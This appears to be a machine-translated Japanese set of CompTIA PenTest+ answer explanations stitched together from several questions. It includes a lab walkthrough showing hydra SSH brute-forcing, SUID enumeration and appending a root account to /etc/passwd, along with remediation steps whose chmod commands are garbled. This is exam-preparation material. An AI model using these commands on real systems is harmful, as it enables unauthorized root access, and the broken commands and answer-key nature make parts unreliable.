* Censys.io:
* Censys.ioは、インターネット接続デバイスのための検索エンジンです。IPアドレス、ドメイン、GeoIPデータ、公開されているサービスに関する情報を提供します。
* 他のオプションを選択しないのはなぜですか?
* A (WiGLE.net): IP アドレスやサービスに関する詳細な情報は提供せず、Wi-Fi ネットワークのマッピングに重点を置いています。
* B (WHOIS): ドメイン登録と所有権の詳細は提供されますが、GeoIP とサービス概要は提供されません。
* C (theHarvester): 主に電子メール アドレス、サブドメイン、名前などの OSINT を収集しますが、サービス情報や GeoIP データは収集しません。
CompTIA Pentest+ リファレンス:
* ドメイン 2.0 (情報収集と脆弱性の特定)

完全な解決策については、以下の説明を参照してください。
Explanation:
サービスを悪用する可能性が最も高いコマンドは次のとおりです。
hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22
権限を昇格するための適切なコマンド セットは次のとおりです。
echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd
権限昇格が成功した後に実行する必要がある修復は次のとおりです。
cp から SUID ビットを削除します。
バックアップ スクリプトを世界書き込み不可にします。
シミュレーションの包括的なステップバイステップの説明
パート1：脆弱なサービスの悪用
Nmapスキャン分析
コマンド: nmap -sC -T4 192.168.10.2
目的: このコマンドは、タイミング テンプレート 4 (アグレッシブ) を使用してデフォルトのスクリプト スキャンを実行します。
出力：
バッシュ
コードをコピー
港湾国サービス
22/tcp オープン SSH
23/tcp クローズド telnet
80/tcp オープン http
111/tcp クローズ rpcbind
445/tcp オープンサンバ
3389/tcp クローズド RDP
開いているポートは SSH (22)、HTTP (80)、Samba (445) です。
Samba共有の列挙
コマンド: enum4linux -S 192.168.10.2
目的: Samba の共有とユーザーを列挙します。
出力：
メイクファイル
コードをコピー
ユーザー:[ゲーム] rid:[0x3f2]
ユーザー:[nobody] rid:[0x1f5]
ユーザー:[bind] rid:[0x4ba]
ユーザー:[プロキシ] rid:[0x42]
ユーザー:[syslog] rid:[0x4ba]
ユーザー:[www-data] rid:[0x42a]
ユーザー:[root] rid:[0x3e8]
ユーザー:[ニュース] rid:[0x3fa]
ユーザー:[lowpriv] rid:[0x3fa]
lowpriv のユーザーを識別します。
エクスプロイトコマンドの選択
Hydra コマンド: hydra -l lowpriv -P 500-worst-passwords.txt -t 4 ssh://192.168.10.2:22 目的: lowpriv ユーザーと最悪のパスワード 500 個のリストを使用して、SSH に対してブルート フォース攻撃を実行します。
-l lowpriv: ユーザー名を指定します。
-P 500-worst-passwords.txt: パスワード リストを指定します。
-t 4: 攻撃に 4 つのタスク/スレッドを使用します。
ssh://192.168.10.2:22: SSH サービスとポートを指定します。
Hydraコマンドの実行
結果: 一致が見つかった場合、lowpriv ユーザーとしてログインに成功します。
パート2: 権限昇格と修復
SUIDバイナリと設定ファイルの検索
コマンド: find / -perm -2 -type f 2>/dev/null | xargs ls -l
目的: 世界が書き込み可能なファイルを見つける。
コマンド: find / -perm -u=s -type f 2>/dev/null | xargs ls -l
目的: SUID 権限を持つファイルを検索します。
コマンド: grep "/bin/bash" /etc/passwd | cut -d':' -f1-4,6,7
目的: bash シェルへのアクセス権を持つユーザーを識別します。
権限昇格コマンドの選択
コマンド: echo "root2:5ZOYXRFHVZ7OY::0:0:root:/root:/bin/bash" >> /etc/passwd 目的: passwd ファイルに新しい root ユーザー エントリを作成します。
root2: ユーザー名。
5ZOYXRFHVZ7OY: パスワードハッシュ。
::0:0: ユーザーおよびグループ ID (root)。
/root: ホームディレクトリ。
/bin/bash: デフォルトのシェル。
権限昇格コマンドの実行
結果: 指定されたパスワードを持つ新しい root ユーザー root2 が作成されます。
エクスプロイト後の修復手順
cp から SUID ビットを削除します。
コマンド: chmod us /bin/cp
目的: 誤用を防ぐために cp から SUID ビットを削除します。
バックアップ スクリプトを世界書き込み不可にする:
コマンド: chmod ow /path/to/backup/script
目的: 不正な変更を防ぐために、バックアップ スクリプトがすべてのユーザーによって書き込み可能ではないことを確認します。
実行と検証
Hydra攻撃の検証:
Hydra コマンドを実行し、成功したログイン試行を監視します。
権限昇格の検証:
新しい root ユーザーを passwd ファイルに追加した後、ユーザーを root2 に切り替えて root 権限を確認します。
修復の実施:
修復コマンドを適用してシステムを保護し、変更が実装されたことを確認します。
これらの詳細な手順に従うことで、シミュレーションを複製し、エクスプロイトと必要な修復の両方を徹底的に理解することができます。

質問に記載されているPythonスクリプトは、異なるメソッド（「OPTIONS」、「TRACE」、「TEST」）を使用して指定されたURL（「http://server.net」）にHTTPリクエストを送信し、使用されたメソッド、ステータスコード、および各レスポンスの理由を出力するように設計されています。このスクリプトの主な目的は次のとおりです。
HTTPメソッドの可用性 (B): スクリプトは様々なHTTPメソッドを循環的に実行することで、Webサーバーがどのメソッドをサポートしているかを確認します。これにより、潜在的な脆弱性が明らかになる可能性があります。「TRACE」などの特定のメソッドは、特定の状況（例：クロスサイトトレーシング（XST）攻撃）で悪用される可能性があるためです。
Webサーバーフィンガープリンティング (D): 様々なHTTPメソッドへの応答は、Webサーバーのソフトウェアや設定に関する手がかりとなり、サーバーフィンガープリンティングに役立ちます。この情報は、更なる攻撃をカスタマイズしたり、サーバーのセキュリティ状況を把握したりするために活用できます。
このスクリプトは、サービス拒否を引き起こしたり、Web アプリケーション ファイアウォールを検出したり、エラー処理を調べたり、バナーを直接取得したりすることを目的として設計されておらず、オプション A、C、E、および F は除外されます。

WPA2ハンドシェイクをキャプチャする前に、ワイヤレスアダプタでモニタリングモードを有効にすることが不可欠です。モ​​ニタリングモードを有効にすると、アダプタはハンドシェイクをキャプチャするために必要な、周囲のすべてのワイヤレストラフィックをキャプチャできるようになります。

すべての解決策については、以下の説明を参照してください。
Explanation: